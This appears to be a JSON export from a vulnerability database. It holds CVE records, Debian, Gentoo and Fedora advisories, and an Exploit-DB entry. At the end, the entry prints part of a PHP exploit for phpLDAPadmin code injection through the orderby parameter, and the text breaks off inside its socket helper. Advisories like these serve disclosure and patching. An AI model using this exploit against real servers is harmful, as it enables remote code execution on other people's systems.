"cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:07", "description": "The masort function in lib/functions.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to execute arbitrary PHP code via the orderby parameter (aka sortby variable) in a query_engine action to cmd.php, as exploited in the wild in October 2011.", "edition": 5, "cvss3": {}, "published": "2011-11-02T17:55:00", "title": "CVE-2011-4075", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4075"], "modified": "2020-11-09T13:30:00", "cpe": ["cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.1", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.1", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.3", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.5", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.4", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.2", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.1.1"], "id": "CVE-2011-4075", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4075", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:04", "description": "SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.", "edition": 7, "cvss3": {}, "published": "2011-07-28T18:55:00", "title": "CVE-2011-2688", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2020-11-16T20:47:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:5.0", "cpe:/a:mod_authnz_external_project:mod_authnz_external:3.2.5", "cpe:/o:debian:debian_linux:7.0"], "id": "CVE-2011-2688", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mod_authnz_external_project:mod_authnz_external:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:00", "description": "Directory traversal vulnerability in the administration console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.41, 7.0 before 7.0.0.19, and 8.0 before 8.0.0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.", "edition": 4, "cvss3": {}, "published": "2011-09-06T15:55:00", "title": "CVE-2011-1359", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1359"], "modified": "2017-08-17T01:34:00", "cpe": ["cpe:/a:ibm:websphere_application_server:7.0.0.8", "cpe:/a:ibm:websphere_application_server:6.1.0.2", "cpe:/a:ibm:websphere_application_server:7.0.0.3", "cpe:/a:ibm:websphere_application_server:6.1.13", "cpe:/a:ibm:websphere_application_server:7.0", "cpe:/a:ibm:websphere_application_server:6.1.6", "cpe:/a:ibm:websphere_application_server:7.0.0.7", "cpe:/a:ibm:websphere_application_server:7.0.0.9", "cpe:/a:ibm:websphere_application_server:6.1.0.25", "cpe:/a:ibm:websphere_application_server:6.1.0.5", "cpe:/a:ibm:websphere_application_server:6.1.0.39", "cpe:/a:ibm:websphere_application_server:6.1.0.35", "cpe:/a:ibm:websphere_application_server:6.1.0", "cpe:/a:ibm:websphere_application_server:6.1.0.3", "cpe:/a:ibm:websphere_application_server:7.0.0.11", "cpe:/a:ibm:websphere_application_server:6.1.0.29", "cpe:/a:ibm:websphere_application_server:6.1.3", "cpe:/a:ibm:websphere_application_server:6.1.0.7", "cpe:/a:ibm:websphere_application_server:6.1.0.37", "cpe:/a:ibm:websphere_application_server:6.1.5", "cpe:/a:ibm:websphere_application_server:6.1.0.1", "cpe:/a:ibm:websphere_application_server:7.0.0.2", "cpe:/a:ibm:websphere_application_server:7.0.0.15", "cpe:/a:ibm:websphere_application_server:6.1.0.11", "cpe:/a:ibm:websphere_application_server:6.1.0.21", "cpe:/a:ibm:websphere_application_server:6.1.0.27", "cpe:/a:ibm:websphere_application_server:8.0.0.0", "cpe:/a:ibm:websphere_application_server:7.0.0.5", "cpe:/a:ibm:websphere_application_server:7.0.0.1", "cpe:/a:ibm:websphere_application_server:6.1.0.9", "cpe:/a:ibm:websphere_application_server:6.1.0.31", "cpe:/a:ibm:websphere_application_server:6.1.7", "cpe:/a:ibm:websphere_application_server:6.1.1", "cpe:/a:ibm:websphere_application_server:6.1.0.33", "cpe:/a:ibm:websphere_application_server:6.1.0.12", "cpe:/a:ibm:websphere_application_server:7.0.0.17", "cpe:/a:ibm:websphere_application_server:6.1", "cpe:/a:ibm:websphere_application_server:7.0.0.4", "cpe:/a:ibm:websphere_application_server:6.1.0.0", "cpe:/a:ibm:websphere_application_server:6.1.0.23", "cpe:/a:ibm:websphere_application_server:7.0.0.6", "cpe:/a:ibm:websphere_application_server:7.0.0.13", "cpe:/a:ibm:websphere_application_server:6.1.0.19", "cpe:/a:ibm:websphere_application_server:6.1.0.15", "cpe:/a:ibm:websphere_application_server:6.1.0.17", "cpe:/a:ibm:websphere_application_server:6.1.14"], "id": "CVE-2011-1359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1359", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:ibm:websphere_application_server:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:8.0.0.0:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-2773", "CVE-2011-2772", "CVE-2011-2771"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2334-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nNovember 04, 2011 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : mahara\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2011-2771 CVE-2011-2772 CVE-2011-2773 \r\n\r\nSeveral vulnerabilities were discovered in Mahara, an electronic \r\nportfolio, weblog, and resume builder:\r\n\r\nCVE-2011-2771\r\n\r\n Teemu Vesala discovered that missing input sanitising of RSS\r\n feeds could lead to cross-site scripting.\r\n\r\nCVE-2011-2772\r\n \r\n Richard Mansfield discovered that insufficient upload restrictions\r\n allowed denial of service.\r\n\r\nCVE-2011-2773\r\n\r\n Richard Mansfield that the management of institutions was prone to\r\n cross-site request forgery.\r\n\r\n&#40;no CVE ID available yet&#41;\r\n\r\n Andrew Nichols discovered a privilege escalation vulnerability\r\n in MNet handling.\r\n\r\nFor the oldstable distribution &#40;lenny&#41;, this problem has been fixed in\r\nversion 1.0.4-4+lenny11.\r\n\r\nFor the stable distribution &#40;squeeze&#41;, this problem has been fixed in\r\nversion 1.2.6-2+squeeze3.\r\n\r\nFor the unstable distribution &#40;sid&#41;, this problem has been fixed in\r\nversion 1.4.1-1.\r\n\r\nWe recommend that you upgrade your mahara packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAk60JbcACgkQXm3vHE4uylqocwCgkWMz4J7ZDTxntTrLf0iYmfAZ\r\nwGUAoLG1TDXaqNB+YgJcTuYqKpkTD8y5\r\n=4JlU\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-11-06T00:00:00", "published": "2011-11-06T00:00:00", "id": "SECURITYVULNS:DOC:27278", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27278", "title": "[SECURITY] [DSA 2334-1] mahara security update", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-1359"], "description": "Title\r\n-----\r\nDDIVRT-2011-33 IBM WebSphere Application Server &#39;help&#39; Servlet Plug-in Bundle Directory Traversal [CVE-2011-1359]\r\n\r\nSeverity\r\n--------\r\nHigh\r\n\r\nDate Discovered\r\n---------------\r\nJuly 28, 2011\r\n\r\nDiscovered By\r\n-------------\r\nDigital Defense, Inc. Vulnerability Research Team\r\nCredit: Javier Castro, sxkeebler and r@b13$\r\n\r\nVulnerability Description\r\n-------------------------\r\nThe default installation of the IBM WebSphere Application Server is \r\ndeployed with a &#39;help&#39; servlet which is designed to serve supporting \r\ndocumentation for the WebSphere system. When the &#39;help&#39; servlet \r\nprocesses a URL that contains a reference to a Java plug-in Bundle \r\nthat is registered with the Eclipse Platform Runtime Environment of \r\nthe WebSphere Application Server, the &#39;help&#39; servlet fails to ensure \r\nthat the submitted URL refers to a file that is both located within the \r\nweb root of the servlet and is of a type that is allowed to be served.\r\n\r\nAn unauthenticated remote attacker can use this weakness in the \r\n&#39;help&#39; servlet to retrieve arbitrary system files from the host that \r\nis running the &#39;help&#39; servlet. This can be accomplished by submitting \r\na URL which refers to a registered Java plug-in Bundle followed by a \r\nrelative path to the desired file.\r\n\r\nSolution Description\r\n--------------------\r\nIBM has released a patch for this issue. The patch is available through APAR PM45322.\r\n\r\nhttp://www-01.ibm.com/support/docview.wss?uid=swg21509257\r\n\r\nTested Systems / Software &#40;with versions&#41;\r\n------------------------------------------\r\nWebSphere Application Server Version 8.0\r\nWebSphere Application Server Version 7.0\r\nWebSphere Application Server Version 6.1\r\n\r\nVendor Contact\r\n--------------\r\nVendor Name: IBM\r\nVendor Website: http://www-01.ibm.com/software/webservers/appserv/was/library/\r\n", "edition": 1, "modified": "2011-11-06T00:00:00", "published": "2011-11-06T00:00:00", "id": "SECURITYVULNS:DOC:27281", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27281", "title": "DDIVRT-2011-33 IBM WebSphere Application Server &#39;help&#39; Servlet Plug-in Bundle Directory Traversal [CVE-2011-1359]", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-2688"], "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 201110-23\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: Low\r\n Title: Apache mod_authnz_external: SQL injection\r\n Date: October 25, 2011\r\n Bugs: #386165\r\n ID: 201110-23\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nAn input sanitation flaw in mod_authnz_external allows remote attacker\r\nto conduct SQL injection.\r\n\r\nBackground\r\n==========\r\n\r\nmod_authnz_external is a tool for creating custom authentication\r\nbackends for HTTP basic authentication.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 www-apache/mod_authnz_external\r\n &lt; 3.2.6 &gt;= 3.2.6 \r\n\r\nDescription\r\n===========\r\n\r\nmysql/mysql-auth.pl in mod_authnz_external does not properly sanitize\r\ninput before using it in an SQL query.\r\n\r\nImpact\r\n======\r\n\r\nA remote attacker could exploit this vulnerability to inject arbitrary\r\nSQL statements by using a specially crafted username for HTTP\r\nauthentication on a site using mod_authnz_external.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround at this time.\r\n\r\nResolution\r\n==========\r\n\r\nAll Apache mod_authnz_external users should upgrade to the latest\r\nversion:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot -v &quot;&gt;=www-apache/mod_authnz_external-3.2.6&quot;\r\n\r\nReferences\r\n==========\r\n\r\n[ 1 ] CVE-2011-2688\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2688\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-201110-23.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users&#39; machines is of utmost\r\nimportance to us. Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttps://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2011 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner&#40;s&#41;.\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/2.5", "edition": 1, "modified": "2011-11-06T00:00:00", "published": "2011-11-06T00:00:00", "id": "SECURITYVULNS:DOC:27267", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27267", "title": "[ GLSA 201110-23 ] Apache mod_authnz_external: SQL injection", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-2688"], "description": "SQL injection via username.", "edition": 1, "modified": "2011-07-22T00:00:00", "published": "2011-07-22T00:00:00", "id": "SECURITYVULNS:VULN:11801", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11801", "title": "Apache mod_authnz_external module SQL injection", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-2688"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2279-1 security@debian.org\r\nhttp://www.debian.org/security/ Steffen Joeris\r\nJuly 19, 2011 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : libapache2-mod-authnz-external\r\nVulnerability : SQL injection\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2011-2688 \r\nDebian Bug : 633637\r\n\r\nIt was discovered that libapache2-mod-authnz-external, an apache\r\nauthentication module, is prone to an SQL injection via the $user\r\nparamter.\r\n\r\n\r\nFor the stable distribution &#40;squeeze&#41;, this problem has been fixed in\r\nversion 3.2.4-2+squeeze1.\r\n\r\nThe oldstable distribution &#40;lenny&#41; does not contain\r\nlibapache2-mod-authnz-external\r\n\r\nFor the testing distribution &#40;wheezy&#41;, this problem will be fixed soon.\r\n\r\nFor the unstable distribution &#40;sid&#41;, this problem has been fixed in\r\nversion 3.2.4-2.1.\r\n\r\n\r\nWe recommend that you upgrade your libapache2-mod-authnz-external packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAk4k068ACgkQ62zWxYk/rQdEcACgl9otukAtTDPLIWRr8b7JlbCn\r\ngKYAniArSm7L6ND92ROY1fVsDgiKXD7R\r\n=07Sp\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n\r\n", "edition": 1, "modified": "2011-07-22T00:00:00", "published": "2011-07-22T00:00:00", "id": "SECURITYVULNS:DOC:26677", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26677", "title": "[SECURITY] [DSA 2279-1] libapache2-mod-authnz-external security update", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "description": "PhpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP director y. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location. PhpLDAPadmin is the perfect LDAP browser for the LDAP professional and novice alike. Its user base consists mostly of LDAP administration professionals. Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow access by remote web-clients. ", "modified": "2011-11-25T01:56:24", "published": "2011-11-25T01:56:24", "id": "FEDORA:559EA20CFA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: phpldapadmin-1.2.1.1-2.20111006git.fc14", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "description": "PhpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP director y. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location. PhpLDAPadmin is the perfect LDAP browser for the LDAP professional and novice alike. Its user base consists mostly of LDAP administration professionals. Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow access by remote web-clients. ", "modified": "2011-11-25T02:05:42", "published": "2011-11-25T02:05:42", "id": "FEDORA:25B06216FB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: phpldapadmin-1.2.1.1-2.20111006git.fc15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "description": "PhpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP director y. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location. PhpLDAPadmin is the perfect LDAP browser for the LDAP professional and novice alike. Its user base consists mostly of LDAP administration professionals. Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow access by remote web-clients. ", "modified": "2011-11-25T01:52:56", "published": "2011-11-25T01:52:56", "id": "FEDORA:6627020EBD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: phpldapadmin-1.2.1.1-2.20111006git.fc16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T09:01:41", "description": "phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit. CVE-2011-4074,CVE-2011-4075. Webapps exploit for php platform", "published": "2011-10-23T00:00:00", "type": "exploitdb", "title": "phpLDAPadmin <= 1.2.1.1 query_engine Remote PHP Code Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2011-10-23T00:00:00", "id": "EDB-ID:18021", "href": "https://www.exploit-db.com/exploits/18021/", "sourceData": "<?php\r\n\r\n/*\r\n ------------------------------------------------------------------------\r\n phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit\r\n ------------------------------------------------------------------------\r\n \r\n author...............: EgiX\r\n mail.................: n0b0d13s[at]gmail[dot]com\r\n software link........: http://phpldapadmin.sourceforge.net/\r\n affected versions....: from 1.2.0 to 1.2.1.1\r\n\r\n +-------------------------------------------------------------------------+\r\n | This proof of concept code was written for educational purpose only. |\r\n | Use it at your own risk. Author will be not responsible for any damage. |\r\n +-------------------------------------------------------------------------+\r\n \r\n [-] vulnerable code in /lib/functions.php\r\n \r\n 1002. function masort(&$data,$sortby,$rev=0) {\r\n 1003. if (defined('DEBUG_ENABLED') && DEBUG_ENABLED && (($fargs=func_get_args())||$fargs='NOARGS'))\r\n 1004. debug_log('Entered (%%)',1,0,__FILE__,__LINE__,__METHOD__,$fargs);\r\n 1005. \r\n 1006. # if the array to sort is null or empty\r\n 1007. if (! $data) return;\r\n 1008. \r\n 1009. static $CACHE = array();\r\n 1010. \r\n 1011. if (empty($CACHE[$sortby])) {\r\n 1012. $code = \"\\$c=0;\\n\";\r\n 1013. \r\n 1014. foreach (explode(',',$sortby) as $key) {\r\n 1015. $code .= \"if (is_object(\\$a) || is_object(\\$b)) {\\n\";\r\n 1016. \r\n 1017. $code .= \" if (is_array(\\$a->$key)) {\\n\";\r\n 1018. $code .= \" asort(\\$a->$key);\\n\";\r\n 1019. $code .= \" \\$aa = array_shift(\\$a->$key);\\n\";\r\n \r\n ....\r\n \r\n 1078. $code .= 'return $c;';\r\n 1079. \r\n 1080. $CACHE[$sortby] = create_function('$a, $b',$code);\r\n 1081. }\r\n \r\n The $sortby parameter passed to 'masort' function isn't properly sanitized before being used in a call to create_function()\r\n at line 1080, this can be exploited to inject and execute arbitrary PHP code. The only possible attack vector is when handling\r\n the 'query_engine' command, here input passed through $_REQUEST['orderby'] is passed as $sortby parameter to 'masort' function.\r\n \r\n [-] Disclosure timeline:\r\n \r\n [30/09/2011] - Vulnerability discovered\r\n [02/10/2011] - Issue reported to http://sourceforge.net/support/tracker.php?aid=3417184\r\n [05/10/2011] - Fix committed: http://phpldapadmin.git.sourceforge.net/git/gitweb.cgi?p=phpldapadmin/phpldapadmin;h=76e6dad\r\n [23/10/2011] - Public disclosure\r\n \r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\nfunction http_send($host, $packet)\r\n{\r\n if (!($sock = fsockopen($host, 80)))\r\n die( 